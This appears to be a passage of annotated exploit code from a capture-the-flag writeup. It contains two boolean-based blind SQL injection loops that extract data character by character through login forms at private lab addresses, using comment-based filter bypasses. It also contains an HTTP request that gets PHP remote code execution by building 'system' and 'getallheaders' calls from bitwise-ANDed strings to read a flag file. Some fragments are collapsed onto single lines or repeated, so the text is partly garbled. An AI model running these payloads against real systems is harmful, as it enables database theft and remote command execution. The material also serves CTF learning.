# Boolean-based blind extraction loop from the writeup: the login response text is
# the only oracle, and one character is recovered per pass of the inner loop.
# `string`, `sess` (a requests-style session) and `url` are not defined in this
# excerpt — presumably set up earlier in the script; confirm before reuse.
flag = '0x5e'  # hex literal seed; 0x5e is '^', later bytes are appended as two hex digits each
table = string.ascii_letters + '_' + string.digits  # candidate characters, tried in this order
table = [ord(i) for i in table]  # work with code points so hex()/chr() can be applied directly
raw_flag = ''  # human-readable copy of the hex-encoded `flag`
for _ in range(100):  # upper bound on recovered characters; no early exit from this outer loop
    for i in table:
        # hex(i) is '0x..'; [2:] drops the prefix. Every code point in `table` is >= 48,
        # so the hex form is always two digits here and no padding is actually applied.
        t = flag + hex(i)[2:].rjust(0, '2')
        #print(t)
        data = {
            'username': '\\',
            'password': '||password/**/regexp/**/binary/**/%s#' % t
        }
        res = sess.post(url, data)
        if 'success' in res.text:  # oracle: server reports success only when the prefix matches
            #print(chr(i))
            flag += hex(i)[2:].rjust(0, '2')  # commit the candidate in hex form
            print(flag)
            raw_flag += chr(i)
            print(raw_flag)
            break
        # Reached only when the last candidate also failed (a match would have hit `break`);
        # the outer loop still continues, so this is a warning, not a stop.
        if i == table[-1]:
            print('WARNGIN')
用 & 绕一下过滤,即可 rce
GET /c2ZtdHFs.php?gzmtu=(sysuem%26sysvem)((currenu%26currenv)((weucmmhecders%26oevennheeders)())) HTTP/1.1 A: cat /flag.txt Host: 172.20.29.102
res = sess.post('http://172.20.29.105/index.php', data=data) #print(res.text) if'hacker'in res.text: print('hacker')
if'Too Young Too Simple'in res.text: flag += chr(i) print(flag) break if i == table[-1]: print('WARNNING')
# Second extraction loop: same oracle pattern as above, but the recovered string is
# built from the right (each found character is prepended). `flag`, `table`, `sess`,
# `query` and `to_chr` are defined outside this excerpt — `to_chr` presumably renders
# a string as a chr()-concatenation; verify against its definition.
for _ in range(100):  # upper bound on recovered characters; outer loop never breaks early
    for i in table:
        # Build "chr(i)||<encoded flag>"; the leading '||' is stripped by t[2:].
        t = f'||chr({i})' + to_chr(flag)
        t = t[2:]
        data = {
            'username': 'admin',
            'password': "admin'/**/or/**/'1'/**/and/**/cast(position(%s/**/in/**/(%s))/**/as/**/bool)/**/and/**/'1" % (
                t, query)
        }
        res = sess.post('http://172.20.29.105/index.php', data=data)
        # print(res.text)
        if 'hacker' in res.text:  # server-side filter tripped; logged but not acted on
            print('hacker')
        if 'Too Young Too Simple' in res.text:  # oracle: this response marks a matching candidate
            flag = chr(i) + flag  # prepend, unlike the first loop which appends
            print(flag)
            break
        # Reached only when the last candidate also failed; the outer loop carries on.
        if i == table[-1]:
            print('WARNNING')